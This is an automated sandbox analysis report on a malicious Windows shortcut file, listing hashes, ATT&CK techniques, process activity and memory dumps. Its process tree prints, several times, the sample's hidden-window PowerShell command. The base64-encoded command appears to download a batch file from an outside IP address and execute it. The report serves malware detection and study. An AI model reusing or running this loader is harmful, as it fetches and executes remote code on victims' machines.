d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11/11/2024, 15:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
Size

2KB
MD5

5358d8d8fe485972eb8115f7daf16080
SHA1

245e93bc84a9e8635732a8b9a9ed2e906a09f1c0
SHA256

d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa
SHA512

5808ab33e81962bc5252022357a2906651a84ad1cdcf007e5b21d0eb9ff1f08c9fde44d186a18c64e06e8c3ccb6b751de000e1877922dccb8cf7e6cc7996bf74

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2964	powershell.exe
2780	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2964	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 2964	3020	cmd.exe	31
PID 3020 wrote to memory of 2964	3020	cmd.exe	31
PID 3020 wrote to memory of 2964	3020	cmd.exe	31
PID 2964 wrote to memory of 2768	2964	powershell.exe	32
PID 2964 wrote to memory of 2768	2964	powershell.exe	32
PID 2964 wrote to memory of 2768	2964	powershell.exe	32
PID 2768 wrote to memory of 2780	2768	cmd.exe	33
PID 2768 wrote to memory of 2780	2768	cmd.exe	33
PID 2768 wrote to memory of 2780	2768	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2964-38-0x000007FEF576E000-0x000007FEF576F000-memory.dmp

Filesize
4KB

Download
memory/2964-39-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2964-41-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-40-0x00000000027D0000-0x00000000027D8000-memory.dmp

Filesize
32KB

Download
memory/2964-43-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-42-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-44-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-49-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download